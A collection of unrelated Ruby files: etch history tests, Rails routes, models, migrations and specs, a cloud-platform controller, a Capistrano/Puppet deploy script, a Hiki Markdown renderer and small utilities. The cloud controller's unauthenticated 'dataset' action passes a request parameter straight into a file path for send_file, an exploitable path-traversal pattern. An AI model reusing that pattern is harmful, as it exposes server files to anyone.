# node group the setup command would run, install BIND (which would create
# the config file), but continue to report an empty original file.
#
testname = 'delayed history setup'
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
</file>
</config>
EOF
end
assert_etch(@server, @testroot, :testname => 'delayed history setup, first run')
origcontents = "This is the original text for #{testname}"
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<setup>
<exec>echo "#{origcontents}" > #{@targetfile}</exec>
</setup>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "Test #{testname}\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents + "\n", get_file_contents(@origfile), testname)
end
def test_history_link
#
# Ensure original file is backed up when it is a link
#
testname = 'history link'
# Generate another file to use as our link target
@destfile = released_tempfile
# Make the original target a link
File.delete(@targetfile)
File.symlink(@destfile, @targetfile)
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(@destfile, File.readlink(@origfile), 'original backup of link')
assert_match("#{@targetfile} -> #{@destfile}", get_file_contents(File.join(@historydir, '0000')), '0000 history file of link')
end
def test_history_directory
#
# Ensure original file is backed up when it is a directory
#
testname = 'history directory'
# Make the original target a directory
File.delete(@targetfile)
Dir.mkdir(@targetfile)
File.open(File.join(@targetfile, 'testfile'), 'w') { |file| }
# Gather some stats about the file before we run etch
before_uid = File.stat(@targetfile).uid
before_gid = File.stat(@targetfile).gid
before_mode = File.stat(@targetfile).mode
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
# Intentionally create the directory with different ownership and perms
# than the original so that we can test that the original was properly
# backed up.
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<directory>
<owner>12345</owner>
<group>12345</group>
<perms>751</perms>
<create/>
</directory>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert(File.directory?(@origfile), 'original backup of directory')
# Verify that etch backed up the original directory properly
assert_equal(before_uid, File.stat(@origfile).uid, 'original directory uid')
assert_equal(before_gid, File.stat(@origfile).gid, 'original directory gid')
assert_equal(before_mode, File.stat(@origfile).mode, 'original directory mode')
# Check that the history log looks reasonable, it should contain an
# 'ls -ld' of the directory
assert_match(" #{@targetfile}", get_file_contents(File.join(@historydir, '0000')), '0000 history file of directory')
end
def test_history_directory_contents
#
# Ensure original file is backed up when it is a directory and it is
# being converted to something else, as the original backup is handled
# differently in that case
#
testname = 'history directory'
origtarfile = File.join(@testroot, 'var', 'etch', 'orig', "#{@targetfile}.TAR")
# Make the original target a directory
File.delete(@targetfile)
Dir.mkdir(@targetfile)
File.open(File.join(@targetfile, 'testfile'), 'w') { |file| }
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
<warning_file/>
<overwrite_directory/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
# In this case, because we converted a directory to something else the
# original will be a tarball of the directory
assert(File.file?(origtarfile), 'original backup of directory converted to file')
# The tarball should have two entries, the directory and the 'testfile'
# we put inside it
assert_equal('2', `tar tf #{origtarfile} | wc -l`.chomp.strip, 'original backup of directory contents')
end
def test_history_conversion
#
# Test the conversion of old RCS history logs to the new format
#
testname = 'history conversion'
# It is getting harder and harder to find a package of RCS for
# modern operating systems. And at this point the likelihood of
# anyone still having unconverted history logs is getting vanishingly
# small. So if we don't have the RCS executables available just skip
# these tests.
if `which ci` == '' || `which co` == ''
return
end
# Mock up an original file and RCS history log
mockorigcontents = "This is the original text\n"
FileUtils.mkdir_p(File.dirname(@origfile))
File.open(@origfile, 'w') do |file|
file.write(mockorigcontents)
end
historyparent = File.dirname(@historydir)
FileUtils.mkdir_p(historyparent)
File.open(@historydir, 'w') do |file|
file.write(mockorigcontents)
end
histrcsdir = File.join(historyparent, 'RCS')
FileUtils.mkdir_p(histrcsdir)
histbase = File.basename(@historydir)
system(
"cd #{historyparent} && " +
"ci -q -t-'Original of an etch modified file' " +
"-m'Update of an etch modified file' #{histbase} && " +
"co -q -r -kb #{histbase}")
mocksourcecontents = "This is the contents in the RCS history log\n"
system("cd #{historyparent} && co -q -l #{histbase}")
File.open(@historydir, 'w') do |file|
file.write(mocksourcecontents)
end
system(
"cd #{historyparent} && " +
"ci -q -t-'Original of an etch modified file' " +
"-m'Update of an etch modified file' #{histbase} && " +
"co -q -r -kb #{histbase}")
File.open(@targetfile, 'w') do |file|
file.write(mocksourcecontents)
end
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(mockorigcontents, get_file_contents(File.join(@historydir, '0000')), 'RCS conv 0000 history file')
assert_equal(mocksourcecontents, get_file_contents(File.join(@historydir, '0001')), 'RCS conv 0001 history file')
assert_equal(sourcecontents, get_file_contents(File.join(@historydir, 'current')), 'RCS conv current history file')
end
def teardown
remove_repository(@repodir)
FileUtils.rm_rf(@testroot)
FileUtils.rm_rf(@targetfile)
end
end
|
House::Application.routes.draw do
#root
root 'mixes#index'
# Routes for the Mix resource:
# CREATE
get '/mixes/new', controller: 'mixes', action: 'new', as: 'new_mix'
post '/mixes', controller: 'mixes', action: 'create', as: 'mixes'
# READ
get '/mixes', controller: 'mixes', action: 'index'
get '/mixes/:id', controller: 'mixes', action: 'show', as: 'mix'
# UPDATE
get '/mixes/:id/edit', controller: 'mixes', action: 'edit', as: 'edit_mix'
patch '/mixes/:id', controller: 'mixes', action: 'update'
# DELETE
delete '/mixes/:id', controller: 'mixes', action: 'destroy'
#------------------------------
# Routes for the Dj resource:
# CREATE
get '/djs/new', controller: 'djs', action: 'new', as: 'new_dj'
post '/djs', controller: 'djs', action: 'create', as: 'djs'
# READ
get '/djs', controller: 'djs', action: 'index'
get '/djs/:id', controller: 'djs', action: 'show', as: 'dj'
# UPDATE
get '/djs/:id/edit', controller: 'djs', action: 'edit', as: 'edit_dj'
patch '/djs/:id', controller: 'djs', action: 'update'
# DELETE
delete '/djs/:id', controller: 'djs', action: 'destroy'
#------------------------------
# The priority is based upon order of creation: first created -> highest priority.
# See how all your routes lay out with "rake routes".
# You can have the root of your site routed with "root"
# root 'welcome#index'
# Example of regular route:
# get 'products/:id' => 'catalog#view'
# Example of named route that can be invoked with purchase_url(id: product.id)
# get 'products/:id/purchase' => 'catalog#purchase', as: :purchase
# Example resource route (maps HTTP verbs to controller actions automatically):
# resources :products
# Example resource route with options:
# resources :products do
# member do
# get 'short'
# post 'toggle'
# end
#
# collection do
# get 'sold'
# end
# end
# Example resource route with sub-resources:
# resources :products do
# resources :comments, :sales
# resource :seller
# end
# Example resource route with more complex sub-resources:
# resources :products do
# resources :comments
# resources :sales do
# get 'recent', on: :collection
# end
# end
# Example resource route with concerns:
# concern :toggleable do
# post 'toggle'
# end
# resources :posts, concerns: :toggleable
# resources :photos, concerns: :toggleable
# Example resource route within a namespace:
# namespace :admin do
# # Directs /admin/products/* to Admin::ProductsController
# # (app/controllers/admin/products_controller.rb)
# resources :products
# end
end
|
class Expense < ApplicationRecord
has_one :expensetype
end
|
class CreateProductCategories < ActiveRecord::Migration
def up
create_table "product_categories" do |t|
t.string "title"
t.integer "list_order", :default => 999
t.datetime "created_at"
t.datetime "updated_at"
t.integer "parent_id"
t.integer "sale_id"
end
add_index "product_categories", ["list_order"], :name => "index_product_categories_on_list_order"
add_index "product_categories", ["parent_id"], :name => "index_product_categories_on_parent_id"
add_index "product_categories", ["sale_id"], :name => "index_product_categories_on_sale_id"
end
def down
drop_table :product_categories
end
end |
class Record < ApplicationRecord
belongs_to :zone
validates :name, presence: true
end
|
require 'support/models_shared_examples'
RSpec.describe User, type: :model do
let(:valid_user) { build(:user) }
let(:unique_user) { build(:user, :unique_user) }
let(:required) { "を入力してください。" }
let(:required_and_invalid_params) { "を入力してください。" ", " "は不正な値です。" }
let(:too_long_name) { "は128文字以内で入力してください。" }
let(:too_long_email) { "は255文字以内で入力してください。"}
let(:not_unique) { "はすでに存在します。" }
let(:unmatched_regex) { "は不正な値です。" }
let(:too_short_password) { "は6文字以上で入力してください。"}
let(:ummatched_password) { "とパスワードの入力が一致しません。"}
context '値が正常な場合' do
let(:valid_object) { valid_user }
it_behaves_like :valid_object_examples
end
context '値が不正な場合' do
let(:key) { :name }
context 'nameが不正な場合' do
context '空' do
let(:error_message) { required }
subject { build(:user, name: "") }
it_behaves_like '空の場合'
end
context '129文字以上' do
let(:error_message) { too_long_name }
subject { build(:user, name: "a" * 129) }
it_behaves_like '129文字以上'
end
end
context 'emailが不正な場合' do
let(:key) { :email }
pending '空' do
let(:error_message) { required_and_invalid_params }
subject { build(:user, email: "") }
it_behaves_like '空の場合'
end
context '256文字以上' do
let(:error_message) { too_long_email }
subject { build(:user, email: "a" * 245 + "@sample.com") }
it_behaves_like '256文字以上'
end
context 'emailが一意でない' do
subject { build(:user, email: "unique@sample.com") }
it 'Userが作成されないこと' do
unique_user.save
subject.save
is_expected.to be_invalid
end
it 'emailに正しいエラーメッセージが格納されること' do
unique_user.save
subject.save
expect(subject.errors[:email]).to eq [not_unique]
end
end
context 'emailが正規表現にマッチしない' do
context 'メールアドレスに@がない' do
subject { build(:user, email: "samplemail.com") }
it 'Userが作成されないこと' do
is_expected.to be_invalid
end
it 'emailに正しいエラーメッセージが格納されること' do
subject.save
expect(subject.errors[:email]).to eq [unmatched_regex]
end
end
context '@の前に1文字以上の入力がない' do
subject { build(:user, email: "@mail.com") }
it 'Userが作成されないこと' do
is_expected.to be_invalid
end
it 'emailに正しいエラーメッセージが格納されること' do
subject.save
expect(subject.errors[:email]).to eq [unmatched_regex]
end
end
context '.の前に1文字以上の入力がない' do
subject { build(:user, email: "sample@.com") }
it 'Userが作成されないこと' do
is_expected.to be_invalid
end
it 'emailに正しいエラーメッセージが格納されること' do
subject.save
expect(subject.errors[:email]).to eq [unmatched_regex]
end
end
context '.の後に1文字以上の入力がない' do
subject { build(:user, email: "sample@mail.") }
it 'Userが作成されないこと' do
is_expected.to be_invalid
end
it 'emailに正しいエラーメッセージが格納されること' do
subject.save
expect(subject.errors[:email]).to eq [unmatched_regex]
end
end
end
end
context 'passwordが不正な場合' do
let(:key) { :password }
context '空' do
let(:error_message) { required }
subject { build(:user, password: "") }
it_behaves_like '空の場合'
end
context '6文字未満' do
let(:error_message) { too_short_password }
subject { build(:user, password: "foo") }
it_behaves_like '6文字未満'
end
end
context 'password_confirmationが不正な場合' do
let(:key) { :password_confirmation }
context '空' do
let(:error_message) { ummatched_password }
subject { build(:user, password: "foobar", password_confirmation: "") }
it_behaves_like '空の場合'
end
context '6文字未満' do
let(:error_message) { ummatched_password }
subject { build(:user, password: "foobar", password_confirmation: "foo") }
it_behaves_like '6文字未満'
end
context 'パスワードとパスワード再確認が一致しない' do
let(:error_message) { ummatched_password }
subject { build(:user, password: "foobar", password_confirmation: "barfoo") }
it_behaves_like 'パスワードとパスワード再確認が一致しない'
end
end
end
end
|
require 'rails_helper'
RSpec.describe Order, :type => :model do
let(:order) { create :order }
let(:item) { create :item}
let(:address) do
Address.new(order_id: 1, street_1: "123 Washington St", city: "Denver", state: "CO", zip: "80202")
end
it "belongs to one user" do
user = User.new
order.user_id = user.id
expect(order.user_id).to eq(user.id)
end
it 'is valid' do
expect(order).to be_valid
end
it 'has many items' do
item_1 = create :item, title: "Item1"
item_2 = create :item, title: "Item2"
item_1.orders << order
item_2.orders << order
assert item_1.orders.include?(order)
assert item_2.orders.include?(order)
end
it 'adds item to order' do
order.add_item(item)
assert order.items.include? item
end
it 'removes item from order' do
order.add_item(item)
order.remove_item(item)
refute order.items.include? item
end
it 'increases quantity if item is in order' do
order.add_item(item)
order.add_item(item)
assert order.items.length == 1
end
it 'tells arrival time when requested' do
order.order
order.request
assert_equal (order.updated_at + 45.minutes).strftime('%l:%M %p'), order.arrival_time
end
def build_item
create(:item)
end
end
|
require 'rest-client'
class CloudPlatformController < ApplicationController
before_action :authenticate_user!, :except => [:dataset]
def index
end
def delete
ids = params[:id].split("-")
Instance.delete(ids)
ids.each do |id|
filename = Rails.root.join("storage/"+id.to_s+"_input_dataset.json")
if File.exist?(filename)
File.delete(filename)
end
end
render :text => "OK"
end
def show
instance = Instance.find(params[:id])
@results = instance[:results]
configuration = ::Configuration.find(instance[:configuration_id])
@input_params = ActiveSupport::JSON.decode(configuration[:params])
end
def instances
status = Array["Waiting","Submitted","Scheduled","Running","Done","Failed","Cancelled","Unknown","Cancellation"]
results = Array.new
instances = Instance.order(created_at: :desc).all
instances.each do |instance|
instance[:status] = status[instance[:status].to_i]
results.push(instance)
end
table_data = { :recordsTotal => results.length, :recordsFiltered => results.length, :data => results }
render :json => table_data
end
def dataset
filename = Rails.root.join("storage/"+params[:id].to_s+"_input_dataset.json")
send_file filename
end
def resources
@date = params[:date].to_date unless params[:date].nil?
@date ||= Date.today
@period = params[:resources_period] unless params[:resources_period].nil?
@period ||= "day"
rest_url = 'http://' + ENGINE_CONFIG[:rest_api][:address] + ':'+ ENGINE_CONFIG[:rest_api][:port].to_s + '/api/v1'
begin
@response_summary = RestClient.get rest_url + '/summary/' + @period +'/' + @date.to_s
@response_providers = RestClient.get rest_url + '/providers/' + @period +'/' + @date.to_s
@response_tasks = RestClient.get rest_url + '/tasks/'+ @period +'/' + @date.to_s
@response_analysis = RestClient.get rest_url + '/analysis/'+ @period +'/' + @date.to_s
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET,Errno::ECONNREFUSED
flash[:ce_error] = "Unable to connect to Cloud Engine."
@response_summary = Hash.new
@response_providers = Hash.new
@response_tasks = Hash.new
@response_analysis = Hash.new
end
end
def resource
@engine_id = params[:id]
@date = params[:date].to_date unless params[:date].nil?
@date ||= Date.today
@period = params[:resources_period] unless params[:resources_period].nil?
@period ||= "day"
rest_url = 'http://' + ENGINE_CONFIG[:rest_api][:address] + ':'+ ENGINE_CONFIG[:rest_api][:port].to_s + '/api/v1'
begin
@engine_profile = RestClient.get rest_url + '/engine/' + @engine_id
@engine_utilization = RestClient.get rest_url + '/engine_utilization/' + @engine_id + '/' + @period + '/' + @date.to_s
@engine_cost = RestClient.get rest_url + '/engine_cost/'+ @engine_id +'/' + @period + '/' + @date.to_s
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET,Errno::ECONNREFUSED
flash[:ce_error] = "Unable to connect to Cloud Engine."
@engine_profile = Hash.new
@engine_utilization = Hash.new
@engine_cost = Hash.new
end
end
def machines
@date = params[:date].to_date unless params[:date].nil?
@date ||= Date.today
@period = params[:resources_period] unless params[:resources_period].nil?
@period ||= "day"
rest_url = 'http://' + ENGINE_CONFIG[:rest_api][:address] + ':'+ ENGINE_CONFIG[:rest_api][:port].to_s + '/api/v1'
begin
@response_engines = RestClient.get rest_url + '/engines/'+ @period +'/' + @date.to_s
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET,Errno::ECONNREFUSED
flash[:ce_error] = "Unable to connect to Cloud Engine."
@response_engines = Hash.new
end
end
def tasks
@date = params[:date].to_date unless params[:date].nil?
@date ||= Date.today
@period = params[:resources_period] unless params[:resources_period].nil?
@period ||= "day"
rest_url = 'http://' + ENGINE_CONFIG[:rest_api][:address] + ':'+ ENGINE_CONFIG[:rest_api][:port].to_s + '/api/v1'
begin
@response_tasks = RestClient.get rest_url + '/tasks/'+ @period +'/' + @date.to_s
rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET,Errno::ECONNREFUSED
flash[:ce_error] = "Unable to connect to Cloud Engine."
@response_tasks = Hash.new
end
end
def chart
end
end
|
# == Schema Information
#
# Table name: jobs
#
# id :integer not null, primary key
# client_id :integer
# data_destruction :string(255)
# no_items :integer default(0)
# collection_date :date
# priority :string(255)
# created_at :datetime
# updated_at :datetime
# third_party_destruction :string(255)
# admin_notes :text
# warehouse_notes :text
# reporting_required :boolean
# contact_user :string(255)
# items_booked :integer default(0)
# status_text :string(255) default("incoming")
# onhold :boolean default(FALSE)
# collection_instructions :text
# processing_instructions :text
# completion_date :date
# received_date :date
# archived_date :date
# booked_items_count :integer default(0)
# scanned_items :text default("--- []\n")
# failed_scanned_items :text default("--- []\n")
# scan_start :datetime
# scan_end :datetime
# scan_user :datetime
# processing_complete :boolean default(FALSE)
# scanning_complete :boolean default(FALSE)
# cost :decimal(12, 2) default(0.0)
# reporting_complete :boolean default(FALSE)
# costing_complete :boolean default(FALSE)
# cost_comments :text default("")
# estimated_cost :decimal(12, 2) default(0.0)
# free :boolean default(FALSE)
# location :string(255)
# interstate_pallet_id :integer default(0)
# wiping_complete :boolean default(FALSE)
# collection_address :text
# aquisition_source :text
# itemised_rebate :boolean default(FALSE)
# enforce_quarantine :boolean default(FALSE)
# interstate_rebate_confirmed :boolean default(FALSE)
# interstate_invoice_confirmed :boolean default(FALSE)
# interstate_rebate_amount :decimal(12, 2) default(0.0)
# interstate_rebate_notes :text
# service_type :string(255)
# recycling_notes :text
# recycling_weight :integer
#
require 'spec_helper'
describe Job do
pending "add some examples to (or delete) #{__FILE__}"
end
|
require 'active_record'
require 'rspec'
require_relative '../app/models/person'
database_configuration = YAML::load(File.open('config/database.yml'))
configuration = database_configuration['test']
ActiveRecord::Base.establish_connection(configuration)
describe Person do
it "should validate the presence of a first name" do
first_name = Person.new({:given_name => '' })
expect(first_name.save).to eq false
end
it "should validate the presence of a family name" do
family_name = Person.new({:family_name => '' })
expect(family_name.save).to eq false
end
it "should accept a mother" do
myMother = Person.new({:given_name => 'MyMother', :family_name => 'Mom'})
myMother.save
myPerson = Person.new({:given_name => 'Me', :family_name => 'Myself'})
myPerson.mother = myMother
myPerson.save
expect(myPerson.mother).to eq myMother
expect(myMother.mother).to eq nil
end
it "should accept a father" do
myFather = Person.new({:given_name => 'MyFather', :family_name => 'L'})
myFather.save
myPerson = Person.new({:given_name => 'Me', :family_name => 'Myself'})
myPerson.father = myFather
myPerson.save
expect(myPerson.father).to eq myFather
expect(myFather.father).to eq nil
end
it "has grandparents" do
grandmaM = Person.new({:given_name => 'granny', :family_name => 'f'})
grandmaM.save
grandpaM = Person.new({:given_name => 'gramps', :family_name => 'f'})
grandpaM.save
myMother = Person.new({:given_name => 'MyMother', :family_name => 'L'})
myMother.mother = grandmaM
myMother.father = grandpaM
myMother.save
grandmaF = Person.new({:given_name => 'grannyF', :family_name => 'f'})
grandmaF.save
grandpaF = Person.new({:given_name => 'grampsF', :family_name => 'f'})
grandpaF.save
myFather = Person.new({:given_name => 'MyFather', :family_name => 'L'})
myFather.mother = grandmaF
myFather.father = grandpaF
myFather.save
myPerson = Person.new({:given_name => 'Me', :family_name => 'Myself'})
myPerson.mother = myMother
myPerson.father = myFather
myPerson.save
expect(myPerson.grandparents).to be_a Array
expect(myPerson.grandparents).to match_array [grandmaM, grandpaM, grandmaF, grandpaF]
# expect(myPerson.grandparents).to match_array [grandpa]
end
end
|
class AddCustomerRefPayment < ActiveRecord::Migration[5.2]
def change
add_reference :payments, :customer, index: true
add_foreign_key :payments, :customers
end
end
|
require 'spec_helper'
describe Puppet::Type.type(:system_attributes) do
# Modify params inline to tests to change the resource
# before it is generated
let(:params) do
{
:name => "/tmp/foo",
:ensure => :present,
}
end
# Modify the resource inline to tests when you modeling the
# behavior of the generated resource
let(:resource) { Puppet::Type.type(:system_attributes).new(params) }
let(:provider) { Puppet::Provider.new(resource) }
let(:catalog) { Puppet::Resource::Catalog.new }
let(:error_pattern) { /Invalid/ }
it "has :name as its keyattribute" do
expect( described_class.key_attributes).to be == [:name]
end
describe "has property" do
[
:ensure, :archive, :hidden, :readonly, :system, :appendonly,
:nodump, :immutable, :av_modified, :av_quarantined, :nounlink, :offline,
:sparse, :sensitive
].each do |prop|
it prop do
expect(described_class.attrtype(prop)).to be == :property
end
end
end
describe "accepts valid parameters for" do
[
:archive, :hidden, :readonly, :system, :appendonly,
:nodump, :immutable, :av_modified, :av_quarantined, :nounlink, :offline,
:sparse, :sensitive
].each do |prop|
context prop do
[:yes,:no].each { |thing|
it "accepts #{thing} " do
params[prop] = thing
expect{resource}.not_to raise_error
end
}
end
end
end
describe "rejects invalid parameters for" do
[
:archive, :hidden, :readonly, :system, :appendonly,
:nodump, :immutable, :av_modified, :av_quarantined, :nounlink, :offline,
:sparse, :sensitive
].each do |prop|
context prop do
[:false,:maybe,1].each { |thing|
it "rejects #{thing} " do
params[prop] = thing
expect{resource}.to raise_error(Puppet::Error,error_pattern)
end
}
end
end
end # Invalid values
context "autorequires" do
context "files" do
it "does not require file when no matching resource exists" do
file = Puppet::Type.type(:file).new(:name => "/tmp/bar")
catalog.add_resource resource
catalog.add_resource file
expect(resource.autorequire.count).to eq 0
end
it "requires the matching file resource" do
file = Puppet::Type.type(:file).new(:name => resource[:file])
catalog.add_resource file
catalog.add_resource resource
reqs = resource.autorequire
expect(reqs.count).to eq 1
expect(reqs[0].source).to eq file
expect(reqs[0].target).to eq resource
end
end
end
end
|
#!/usr/bin/env ruby
# encoding: utf-8
# File: update.rb
# Created: 19/03/12
#
# (c) Michel Demazure <michel@demazure.com>
require_relative '../../jaccess.rb'
require_relative 'build_structure_tables.rb'
require_relative 'build_extended_tables.rb'
module JacintheReports
# methods for building the association and field Jaccess tables
module Update
# before processing
WARNING = ['', 'AVERTISSEMENT', 'Cette opération est destructrice !',
'Les nombres affichés après l\'exécution doivent ressembler à',
' Tables : 40',
' Total joins : 40',
' Extended joins : 100',
' Extended fields : 1000',
'Vérifiez aussi que les quatre fichiers des sous-dossiers',
'\'structure\' et \'extended\' du dossier',
" #{J2R::DATA}",
'ont bien été enregistrés.',
'En cas d\'erreur, reconstituez-les à l\'aide des fichiers \'.bak\'.',
'---------------']
# build and dump joins and fields files
# @param mode [String] configuration
def self.dump_joins_and_fields_tables(mode)
puts "Tables : #{JaccessTables.build_field_table(mode).size}"
JaccessTables.dump_field_table
puts "Total joins : #{JaccessTables.build_join_list(mode).size}"
JaccessTables.dump_join_list
end
# build and dump extended lists files
# @param mode [String] configuration
def self.dump_extended_lists(mode)
J2R.jaccess(mode)
puts "Extended joins : #{ExtendedTables.extended_joins.size}"
ExtendedTables.dump_extended_joins_list
puts "Extended fields : #{ExtendedTables.extended_fields.size}"
ExtendedTables.dump_extended_fields_list
end
# build and dump all DATA files
# @param mode [String] configuration
def self.dump_all_tables(mode)
puts WARNING
dump_joins_and_fields_tables(mode)
dump_extended_lists(mode)
end
end
end
if __FILE__ == $PROGRAM_NAME
include J2R
mode = 'exploitation'
# mode = 'localadmin'
Update.dump_all_tables(mode)
end
|
# Variables d'application
set :application, "puppet"
set :repository, "https://github.com/bashou/puppet.git"
set :deploy_to, "/root/#{application}"
set :shared_children, []
set :normalize_asset_timestamps, false
set :scm, :git
set :scm_verbose, true
set :deploy_via, :remote_cache
set :copy_exclude, [".git/*",".gitignore"]
set :keep_releases, 3
set :rvm_bin_path, "/usr/local/rvm/bin"
set :user, "root"
set :use_sudo, false
default_run_options[:pty] = true
ssh_options[:keys] = [
File.join(ENV["HOME"], ".ssh", "francetv_key"),
]
after "deploy:create_symlink", "deploy:cleanup"
namespace :bootstrap do
task :default do
# Specific RVM string for managing Puppet; may or may not match the RVM string for the application
set :user, "root"
# Set the default_shell to "bash" so that we don't use the RVM shell which isn't installed yet...
set :default_shell, "bash"
# We tar up the puppet directory from the current directory -- the puppet directory within the source code repository
system("tar czf 'puppet.tgz' puppet/")
upload("puppet.tgz","/tmp",:via => :scp)
# Untar the puppet directory, and place at /etc/puppet -- the default location for manifests/modules
run("tar xzf /tmp/puppet.tgz")
try_sudo("rm -rf /etc/puppet")
try_sudo("mv puppet /etc/puppet")
# Bootstrap RVM/Puppet!
try_sudo("bash /etc/puppet/bootstrap.sh")
end
end
namespace :puppet do
task :default do
# Specific RVM string for managing Puppet; may or may not match the RVM string for the application
set :rvm_ruby_string, '1.9.3'
set :rvm_type, :system
set :user, "root"
# We tar up the puppet directory from the current directory -- the puppet directory within the source code repository
system("tar czf 'puppet.tgz' puppet/")
upload("puppet.tgz","/tmp",:via => :scp)
# Untar the puppet directory, and place at /etc/puppet -- the default location for manifests/modules
run("tar xzf /tmp/puppet.tgz")
try_sudo("rm -rf /etc/puppet")
try_sudo("mv puppet/ /etc/puppet")
# Run RVM/Puppet!
run("rvmsudo -p '#{sudo_prompt}' puppet apply /etc/puppet/manifests/site.pp")
end
end
namespace :update do
task :default do
set :user, "dosu"
try_sudo("sudo apt-get update")
try_sudo("sudo apt-get upgrade")
end
end |
module Redcarpet
module Render
class Hiki < Base
def initialize(render_extensions)
super()
@header_offset = 0
if render_extensions[:header_offset]
@header_offset = render_extensions[:header_offset]
end
end
def normal_text(text)
text
end
def escape_inline(text)
## text.gsub(/&/, "&").gsub(/\"/, """).gsub(/>/, ">").gsub(/</, "<")
text
end
def block_code(code, language)
code_text = normal_text(code).chomp
code_text.gsub!(/^/,' ')
"\n#{code_text}\n\n"
end
def block_quote(quote)
quote_text = normal_text(quote).chomp
quote_text.gsub!(/^/,'""')
"\n#{quote_text}\n\n"
end
def block_html(raw_html)
html_text = raw_html.chomp
warning = "XXX: BLOCK_HTML: YOU SHOULD REWRITE IT"
"\n#{warning}\n#{html_text}\n\n"
end
def hrule
"\n//hr\n"
end
def codespan(code)
"``#{escape_inline(code)}``"
end
def header(title, level, anchor="")
l = level - @header_offset
case l
when 1
"\n! #{title}\n"
when 2
"\n!! #{title}\n"
when 3
"\n!!!! #{title}\n"
when 4
"\n!!!! #{title}\n"
when 5
"\n!!!!! #{title}\n"
end
end
def table(header, body)
header_text = ""
if header
header_text = header
end
body.chomp!
"#{header_text}\n\n#{body}\n"
end
def table_row(content)
content+"\n"
end
def table_cell(content, alignment)
"||#{content}"
end
def image(link, title, alt_text)
filename = File.basename(link,".*")
text = alt_text || title
"[[#{text}|#{link}]]"
end
def autolink(link, link_type)
"[[#{escape_inline(link)}]]"
end
def link(link, title, content)
"[[#{escape_inline(content)}|#{escape_inline(link)}]]"
end
def double_emphasis(text)
"''#{escape_inline(text)}''"
end
def emphasis(text)
"'#{escape_inline(text)}'"
end
def strikethrough(text)
"==#{escape_inline(text)}=="
end
def linebreak
"\n\n"
end
def paragraph(text)
"\n\n#{text}\n"
end
def list(content, list_type)
case list_type
when :ordered
"\n"
when :unordered
"\n"
end
end
def list_item(content, list_type)
case list_type
when :ordered
"# #{content.strip}\n"
when :unordered
"* #{content.strip}\n"
end
end
end
end
end
|
require_relative 'minesweeper'
require_relative 'constants'
require_relative 'cell'
require_relative 'board_printer'
#
# Classe para debugar o game
#
class Debug
def run()
puts "Hello! "
end
def assert_equal(expected, actual, message)
if !(expected == actual)
raise "Expected #{expected} but got #{actual} instead"
end
puts "Assertion passed!"
end
def test_block()
yield 5 if block_given?
end
def test_saving()
Minesweeper.new(2,1,1).save_state("#{ENV['HOME']}/test_saving")
end
def test_json()
cell = Cell.new(1,2, false)
json = cell.to_json()
from_json = Cell.from_json(json)
puts "#{from_json}"
# assert_equal(from_json.x, 1)
# assert_equal(from_json.y, 2)
# assert_false(from_json.has_bomb)
# assert_false(from_json.is_flaged)
# assert_false(from_json.has_been_clicked)
end
def test_game_state_saving()
minesweeper = Minesweeper.new(2,3,0)
minesweeper.build_board([[0,0]].to_set())
minesweeper.play(1,0)
minesweeper.save_state("#{ENV['HOME']}/minesweeper_state")
minesweeper = Minesweeper.recover_from_disk("#{ENV['HOME']}/minesweeper_state")
# board_state = minesweeper.board_state()
# board_assertion([['?', '1'],
# ['?', '?'],
# ['?', '?']], board_state)
end
if __FILE__ == $0
Debug.new().test_game_state_saving()
end
end |
require './lib/participant'
class Activity
attr_reader :name,
:participants
def initialize(activity)
@name = activity
@participants = []
end
def add_participant(info)
participant = Participant.new(info)
@participants << participant
end
def calculate_cost
costs = @participants.map do |participant|
participant.paid
end
costs.reduce(0, :+)
end
def split_cost
calculate_cost / @participants.count
end
def calculate_dues
dues = @participants.map do |participant|
due = participant.paid - split_cost
name = participant.name.to_sym
[name, due]
end
Hash[dues]
end
end
|
class ReviewsController < ApplicationController
before_action :set_review, only: [:show, :edit, :update, :destroy]
before_action :can_manage, except: [:index, :show, :create]
before_action :authenticate_user!
respond_to :html, :js
def index
@reviews = Review.all
respond_with(@reviews)
end
def show
respond_with(@review)
end
def edit
end
def create
@review = current_user.reviews.new(review_params)
@review.save
@product = @review.product
respond_with(@review)
end
def update
@review.update(review_params)
respond_with(@review.product,@review)
end
def destroy
@review.destroy
